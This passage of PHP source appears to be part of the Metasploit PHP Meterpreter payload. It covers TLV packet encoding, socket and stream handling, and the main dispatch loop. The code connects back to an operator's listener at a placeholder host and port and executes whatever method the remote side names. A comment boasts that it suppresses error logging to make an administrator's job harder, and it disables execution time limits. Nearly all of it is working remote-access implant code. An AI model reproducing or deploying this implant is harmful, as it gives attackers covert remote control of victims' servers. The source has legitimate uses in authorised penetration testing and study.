# there's no data right now but we haven't hit EOF yet.
if (false === $read and empty($ret)) {
if (interacting($chan_id)) {
handle_dead_resource_channel($c[1]);
}
return false;
}
return $ret;
} else {
return false;
}
}
##
# TLV Helper Functions
##
function generate_req_id() {
$characters = 'abcdefghijklmnopqrstuvwxyz';
$rid = '';
for ($p = 0; $p < 32; $p++) {
$rid .= $characters[rand(0, strlen($characters)-1)];
}
return $rid;
}
function handle_dead_resource_channel($resource) {
global $msgsock;
if (!is_resource($resource)) {
return;
}
$cid = get_channel_id_from_resource($resource);
if ($cid === false) {
my_print("Resource has no channel: {$resource}");
# Make sure the provided resource gets closed regardless of it's status
# as a channel
remove_reader($resource);
close($resource);
} else {
my_print("Handling dead resource: {$resource}, for channel: {$cid}");
# Make sure we close other handles associated with this channel as well
channel_close_handles($cid);
# Notify the client that this channel is dead
$pkt = pack("N", PACKET_TYPE_REQUEST);
packet_add_tlv($pkt, create_tlv(TLV_TYPE_METHOD, 'core_channel_close'));
packet_add_tlv($pkt, create_tlv(TLV_TYPE_REQUEST_ID, generate_req_id()));
packet_add_tlv($pkt, create_tlv(TLV_TYPE_CHANNEL_ID, $cid));
# Add the length to the beginning of the packet
$pkt = pack("N", strlen($pkt) + 4) . $pkt;
write($msgsock, $pkt);
}
return;
}
function handle_resource_read_channel($resource, $data) {
global $udp_host_map;
$cid = get_channel_id_from_resource($resource);
my_print("Handling data from $resource");
# Build a new Packet
$pkt = pack("N", PACKET_TYPE_REQUEST);
packet_add_tlv($pkt, create_tlv(TLV_TYPE_METHOD, 'core_channel_write'));
if (array_key_exists((int)$resource, $udp_host_map)) {
list($h,$p) = $udp_host_map[(int)$resource];
packet_add_tlv($pkt, create_tlv(TLV_TYPE_PEER_HOST, $h));
packet_add_tlv($pkt, create_tlv(TLV_TYPE_PEER_PORT, $p));
}
packet_add_tlv($pkt, create_tlv(TLV_TYPE_CHANNEL_ID, $cid));
packet_add_tlv($pkt, create_tlv(TLV_TYPE_CHANNEL_DATA, $data));
packet_add_tlv($pkt, create_tlv(TLV_TYPE_LENGTH, strlen($data)));
packet_add_tlv($pkt, create_tlv(TLV_TYPE_REQUEST_ID, generate_req_id()));
# Add the length to the beginning of the packet
$pkt = pack("N", strlen($pkt) + 4) . $pkt;
return $pkt;
}
function create_response($req) {
$pkt = pack("N", PACKET_TYPE_RESPONSE);
$method_tlv = packet_get_tlv($req, TLV_TYPE_METHOD);
my_print("method is {$method_tlv['value']}");
packet_add_tlv($pkt, $method_tlv);
$reqid_tlv = packet_get_tlv($req, TLV_TYPE_REQUEST_ID);
packet_add_tlv($pkt, $reqid_tlv);
if (is_callable($method_tlv['value'])) {
$result = $method_tlv['value']($req, $pkt);
} else {
my_print("Got a request for something I don't know how to handle (". $method_tlv['value'] ."), returning failure");
$result = ERROR_FAILURE;
}
packet_add_tlv($pkt, create_tlv(TLV_TYPE_RESULT, $result));
# Add the length to the beginning of the packet
$pkt = pack("N", strlen($pkt) + 4) . $pkt;
return $pkt;
}
function create_tlv($type, $val) {
return array( 'type' => $type, 'value' => $val );
}
function tlv_pack($tlv) {
$ret = "";
#my_print("Creating a tlv of type: {$tlv['type']}");
if (($tlv['type'] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING) {
$ret = pack("NNa*", 8 + strlen($tlv['value'])+1, $tlv['type'], $tlv['value'] . "\0");
}
elseif (($tlv['type'] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT) {
$ret = pack("NNN", 8 + 4, $tlv['type'], $tlv['value']);
}
elseif (($tlv['type'] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL) {
# PHP's pack appears to be busted for chars,
$ret = pack("NN", 8 + 1, $tlv['type']);
$ret .= $tlv['value'] ? "\x01" : "\x00";
}
elseif (($tlv['type'] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW) {
$ret = pack("NN", 8 + strlen($tlv['value']), $tlv['type']) . $tlv['value'];
}
elseif (($tlv['type'] & TLV_META_TYPE_GROUP) == TLV_META_TYPE_GROUP) {
# treat groups the same as raw
$ret = pack("NN", 8 + strlen($tlv['value']), $tlv['type']) . $tlv['value'];
}
elseif (($tlv['type'] & TLV_META_TYPE_COMPLEX) == TLV_META_TYPE_COMPLEX) {
# treat complex the same as raw
$ret = pack("NN", 8 + strlen($tlv['value']), $tlv['type']) . $tlv['value'];
}
else {
my_print("Don't know how to make a tlv of type ". $tlv['type'] . " (meta type ". sprintf("%08x", $tlv['type'] & TLV_META_TYPE_MASK) ."), wtf");
}
return $ret;
}
function packet_add_tlv(&$pkt, $tlv) {
$pkt .= tlv_pack($tlv);
}
function packet_get_tlv($pkt, $type) {
#my_print("Looking for a tlv of type $type");
# Start at offset 8 to skip past the packet header
$offset = 8;
while ($offset < strlen($pkt)) {
$tlv = unpack("Nlen/Ntype", substr($pkt, $offset, 8));
#my_print("len: {$tlv['len']}, type: {$tlv['type']}");
if ($type == ($tlv['type'] & ~TLV_META_TYPE_COMPRESSED)) {
#my_print("Found one at offset $offset");
if (($type & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING) {
$tlv = unpack("Nlen/Ntype/a*value", substr($pkt, $offset, $tlv['len']));
}
elseif (($type & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT) {
$tlv = unpack("Nlen/Ntype/Nvalue", substr($pkt, $offset, $tlv['len']));
}
elseif (($type & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL) {
$tlv = unpack("Nlen/Ntype/cvalue", substr($pkt, $offset, $tlv['len']));
}
elseif (($type & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW) {
$tlv = unpack("Nlen/Ntype", substr($pkt, $offset, 8));
$tlv['value'] = substr($pkt, $offset+8, $tlv['len']-8);
}
else {
my_print("Wtf type is this? $type");
$tlv = null;
}
return $tlv;
}
$offset += $tlv['len'];
}
#my_print("Didn't find one, wtf");
return false;
}
##
# Functions for genericizing the stream/socket conundrum
##
function register_socket($sock, $ipaddr=null, $port=null) {
global $resource_type_map, $udp_host_map;
my_print("Registering socket $sock for ($ipaddr:$port)");
$resource_type_map[(int)$sock] = 'socket';
if ($ipaddr) {
$udp_host_map[(int)$sock] = array($ipaddr, $port);
#dump_array($udp_host_map, "UDP Map after registering a new socket");
}
}
# The stream functions cannot be unconnected, so don't require a host map
function register_stream($stream, $ipaddr=null, $port=null) {
global $resource_type_map, $udp_host_map;
my_print("Registering stream $stream for ($ipaddr:$port)");
$resource_type_map[(int)$stream] = 'stream';
if ($ipaddr) {
$udp_host_map[(int)$stream] = array($ipaddr, $port);
#dump_array($udp_host_map, "UDP Map after registering a new stream");
}
}
function connect($ipaddr, $port, $proto='tcp') {
my_print("Doing connect($ipaddr, $port)");
$sock = false;
# IPv6 requires brackets around the address in some cases, but not all.
# Keep track of the un-bracketed address for the functions that don't like
# brackets, specifically socket_connect and socket_sendto.
$ipf = AF_INET;
$raw_ip = $ipaddr;
if (FALSE !== strpos($ipaddr, ":")) {
$ipf = AF_INET6;
$ipaddr = "[". $raw_ip ."]";
}
# Prefer the stream versions so we don't have to use both select functions
# unnecessarily, but fall back to socket_create if they aren't available.
if (is_callable('stream_socket_client')) {
my_print("stream_socket_client({$proto}://{$ipaddr}:{$port})");
$sock = stream_socket_client("{$proto}://{$ipaddr}:{$port}");
my_print("Got a sock: $sock");
if (!$sock) { return false; }
if ($proto == 'tcp') {
register_stream($sock);
} elseif ($proto == 'udp') {
register_stream($sock, $ipaddr, $port);
} else {
my_print("WTF proto is this: '$proto'");
}
} else
if (is_callable('fsockopen')) {
my_print("fsockopen");
if ($proto == 'tcp') {
$sock = fsockopen($ipaddr,$port);
if (!$sock) { return false; }
if (is_callable('socket_set_timeout')) {
socket_set_timeout($sock, 2);
}
register_stream($sock);
} else {
$sock = fsockopen($proto."://".$ipaddr,$port);
if (!$sock) { return false; }
register_stream($sock, $ipaddr, $port);
}
} else
if (is_callable('socket_create')) {
my_print("socket_create");
if ($proto == 'tcp') {
$sock = socket_create($ipf, SOCK_STREAM, SOL_TCP);
$res = socket_connect($sock, $raw_ip, $port);
if (!$res) { return false; }
register_socket($sock);
} elseif ($proto == 'udp') {
$sock = socket_create($ipf, SOCK_DGRAM, SOL_UDP);
register_socket($sock, $raw_ip, $port);
}
}
return $sock;
}
function eof($resource) {
$ret = false;
switch (get_rtype($resource)) {
# XXX Doesn't work with sockets.
case 'socket': break;
case 'stream':
# We set the socket timeout for streams opened with fsockopen() when
# they are created. I hope this is enough to deal with hangs when
# calling feof() on socket streams, but who knows. This is PHP,
# anything could happen. Some day they'll probably add a new function
# called stream_eof() and it will handle sockets properly except for
# some edge case that happens for every socket except the one or two
# they tested it on and it will always return false on windows and
# later they'll rename it to real_stream_eof_this_language_isretarded().
#
# See http://us2.php.net/manual/en/function.feof.php , specifically this:
# If a connection opened by fsockopen() wasn't closed by the server,
# feof() will hang. To workaround this, see below example:
# <?php
# function safe_feof($fp, &$start = NULL) {
# ...
$ret = feof($resource);
break;
}
return $ret;
}
function close($resource) {
my_print("Closing resource $resource");
global $resource_type_map, $udp_host_map;
remove_reader($resource);
switch (get_rtype($resource)) {
case 'socket': $ret = socket_close($resource); break;
case 'stream': $ret = fclose($resource); break;
}
# Every resource should be in the resource type map, but check anyway
if (array_key_exists((int)$resource, $resource_type_map)) {
unset($resource_type_map[(int)$resource]);
}
if (array_key_exists((int)$resource, $udp_host_map)) {
my_print("Removing $resource from udp_host_map");
unset($udp_host_map[(int)$resource]);
}
return $ret;
}
function read($resource, $len=null) {
global $udp_host_map;
# Max packet length is magic. If we're reading a pipe that has data but
# isn't going to generate any more without some input, then reading less
# than all bytes in the buffer or 8192 bytes, the next read will never
# return.
if (is_null($len)) { $len = 8192; }
#my_print(sprintf("Reading from $resource which is a %s", get_rtype($resource)));
$buff = '';
switch (get_rtype($resource)) {
case 'socket':
if (array_key_exists((int)$resource, $udp_host_map)) {
my_print("Reading UDP socket");
list($host,$port) = $udp_host_map[(int)$resource];
socket_recvfrom($resource, $buff, $len, PHP_BINARY_READ, $host, $port);
} else {
my_print("Reading TCP socket");
$buff .= socket_read($resource, $len, PHP_BINARY_READ);
}
break;
case 'stream':
global $msgsock;
# Calling select here should ensure that we never try to read from a socket
# or pipe that doesn't currently have data. If that ever happens, the
# whole php process will block waiting for data that may never come.
# Unfortunately, selecting on pipes created with proc_open on Windows
# always returns immediately. Basically, shell interaction in Windows
# is hosed until this gets figured out. See https://dev.metasploit.com/redmine/issues/2232
$r = Array($resource);
my_print("Calling select to see if there's data on $resource");
while (true) {
$cnt = stream_select($r, $w=NULL, $e=NULL, 0);
# Stream is not ready to read, have to live with what we've gotten
# so far
if ($cnt === 0) {
break;
}
# if stream_select returned false, something is wrong with the
# socket or the syscall was interrupted or something.
if ($cnt === false or feof($resource)) {
my_print("Checking for failed read...");
if (empty($buff)) {
my_print("---- EOF ON $resource ----");
$buff = false;
}
break;
}
$md = stream_get_meta_data($resource);
dump_array($md);
if ($md['unread_bytes'] > 0) {
$buff .= fread($resource, $md['unread_bytes']);
break;
} else {
#$len = 1;
$tmp = fread($resource, $len);
$buff .= $tmp;
if (strlen($tmp) < $len) {
break;
}
}
if ($resource != $msgsock) { my_print("buff: '$buff'"); }
$r = Array($resource);
}
my_print(sprintf("Done with the big read loop on $resource, got %d bytes", strlen($buff)));
break;
default:
# then this is possibly a closed channel resource, see if we have any
# data from previous reads
$cid = get_channel_id_from_resource($resource);
$c = get_channel_by_id($cid);
if ($c and $c['data']) {
$buff = substr($c['data'], 0, $len);
$c['data'] = substr($c['data'], $len);
my_print("Aha! got some leftovers");
} else {
my_print("Wtf don't know how to read from resource $resource, c: $c");
if (is_array($c)) {
dump_array($c);
}
break;
}
}
my_print(sprintf("Read %d bytes", strlen($buff)));
return $buff;
}
function write($resource, $buff, $len=0) {
global $udp_host_map;
if ($len == 0) { $len = strlen($buff); }
#my_print(sprintf("Writing $len bytes to $resource which is a %s", get_rtype($resource)));
$count = false;
switch (get_rtype($resource)) {
case 'socket':
if (array_key_exists((int)$resource, $udp_host_map)) {
my_print("Writing UDP socket");
list($host,$port) = $udp_host_map[(int)$resource];
$count = socket_sendto($resource, $buff, $len, $host, $port);
} else {
$count = socket_write($resource, $buff, $len);
}
break;
case 'stream':
$count = fwrite($resource, $buff, $len);
fflush($resource);
break;
default: my_print("Wtf don't know how to write to resource $resource"); break;
}
return $count;
}
function get_rtype($resource) {
global $resource_type_map;
if (array_key_exists((int)$resource, $resource_type_map)) {
return $resource_type_map[(int)$resource];
}
return false;
}
function select(&$r, &$w, &$e, $tv_sec=0, $tv_usec=0) {
$streams_r = array();
$streams_w = array();
$streams_e = array();
$sockets_r = array();
$sockets_w = array();
$sockets_e = array();
if ($r) {
foreach ($r as $resource) {
switch (get_rtype($resource)) {
case 'socket': $sockets_r[] = $resource; break;
case 'stream': $streams_r[] = $resource; break;
default: my_print("Unknown resource type"); break;
}
}
}
if ($w) {
foreach ($w as $resource) {
switch (get_rtype($resource)) {
case 'socket': $sockets_w[] = $resource; break;
case 'stream': $streams_w[] = $resource; break;
default: my_print("Unknown resource type"); break;
}
}
}
if ($e) {
foreach ($e as $resource) {
switch (get_rtype($resource)) {
case 'socket': $sockets_e[] = $resource; break;
case 'stream': $streams_e[] = $resource; break;
default: my_print("Unknown resource type"); break;
}
}
}
$n_sockets = count($sockets_r) + count($sockets_w) + count($sockets_e);
$n_streams = count($streams_r) + count($streams_w) + count($streams_e);
#my_print("Selecting $n_sockets sockets and $n_streams streams with timeout $tv_sec.$tv_usec");
$r = array();
$w = array();
$e = array();
# Workaround for some versions of PHP that throw an error and bail out if
# select is given an empty array
if (count($sockets_r)==0) { $sockets_r = null; }
if (count($sockets_w)==0) { $sockets_w = null; }
if (count($sockets_e)==0) { $sockets_e = null; }
if (count($streams_r)==0) { $streams_r = null; }
if (count($streams_w)==0) { $streams_w = null; }
if (count($streams_e)==0) { $streams_e = null; }
$count = 0;
if ($n_sockets > 0) {
$res = socket_select($sockets_r, $sockets_w, $sockets_e, $tv_sec, $tv_usec);
if (false === $res) { return false; }
if (is_array($r) && is_array($sockets_r)) { $r = array_merge($r, $sockets_r); }
if (is_array($w) && is_array($sockets_w)) { $w = array_merge($w, $sockets_w); }
if (is_array($e) && is_array($sockets_e)) { $e = array_merge($e, $sockets_e); }
$count += $res;
}
if ($n_streams > 0) {
$res = stream_select($streams_r, $streams_w, $streams_e, $tv_sec, $tv_usec);
if (false === $res) { return false; }
if (is_array($r) && is_array($streams_r)) { $r = array_merge($r, $streams_r); }
if (is_array($w) && is_array($streams_w)) { $w = array_merge($w, $streams_w); }
if (is_array($e) && is_array($streams_e)) { $e = array_merge($e, $streams_e); }
$count += $res;
}
#my_print(sprintf("total: $count, Modified counts: r=%s w=%s e=%s", count($r), count($w), count($e)));
return $count;
}
function add_reader($resource) {
global $readers;
if (is_resource($resource) && !in_array($resource, $readers)) {
$readers[] = $resource;
}
}
function remove_reader($resource) {
global $readers;
#my_print("Removing reader: $resource");
#dump_readers();
if (in_array($resource, $readers)) {
foreach ($readers as $key => $r) {
if ($r == $resource) {
unset($readers[$key]);
}
}
}
}
##
# Main stuff
##
ob_implicit_flush();
# For debugging
#error_reporting(E_ALL);
# Turn off error reporting so we don't leave any ugly logs. Why make an
# administrator's job easier if we don't have to? =)
error_reporting(0);
@ignore_user_abort(true);
# Has no effect in safe mode, but try anyway
@set_time_limit(0);
@ignore_user_abort(1);
@ini_set('max_execution_time',0);
# If we don't have a socket we're standalone, setup the connection here.
# Otherwise, this is a staged payload, don't bother connecting
if (!isset($GLOBALS['msgsock'])) {
# The payload handler overwrites this with the correct LHOST before sending
# it to the victim.
$ipaddr = '127.0.0.1';
$port = 4444;
my_print("Don't have a msgsock, trying to connect($ipaddr, $port)");
$msgsock = connect($ipaddr, $port);
if (!$msgsock) { die(); }
} else {
# The ABI for PHP stagers is a socket in $msgsock and it's type (socket or
# stream) in $msgsock_type
$msgsock = $GLOBALS['msgsock'];
$msgsock_type = $GLOBALS['msgsock_type'];
switch ($msgsock_type) {
case 'socket':
register_socket($msgsock);
break;
case 'stream':
# fall through
default:
register_stream($msgsock);
}
}
add_reader($msgsock);
#
# Main dispatch loop
#
$r=$GLOBALS['readers'];
while (false !== ($cnt = select($r, $w=null, $e=null, 1))) {
#my_print(sprintf("Returned from select with %s readers", count($r)));
$read_failed = false;
for ($i = 0; $i < $cnt; $i++) {
$ready = $r[$i];
if ($ready == $msgsock) {
$request = read($msgsock, 8);
#my_print(sprintf("Read returned %s bytes", strlen($request)));
if (false==$request) {
#my_print("Read failed on main socket, bailing");
# We failed on the main socket. There's no way to continue, so
# break all the way out.
break 2;
}
$a = unpack("Nlen/Ntype", $request);
# length of the whole packet, including header
$len = $a['len'];
# packet type should always be 0, i.e. PACKET_TYPE_REQUEST
$ptype = $a['type'];
while (strlen($request) < $a['len']) {
$request .= read($msgsock, $len-strlen($request));
}
#my_print("creating response");
$response = create_response($request);
write($msgsock, $response);
} else {
#my_print("not Msgsock: $ready");
$data = read($ready);
if (false === $data) {
handle_dead_resource_channel($ready);
} elseif (strlen($data) > 0){
my_print(sprintf("Read returned %s bytes", strlen($data)));
$request = handle_resource_read_channel($ready, $data);
if ($request) {
write($msgsock, $request);
}
}
}
}
# $r is modified by select, so reset it
$r = $GLOBALS['readers'];
} # end main loop
my_print("Finished");
my_print("--------------------");
close($msgsock);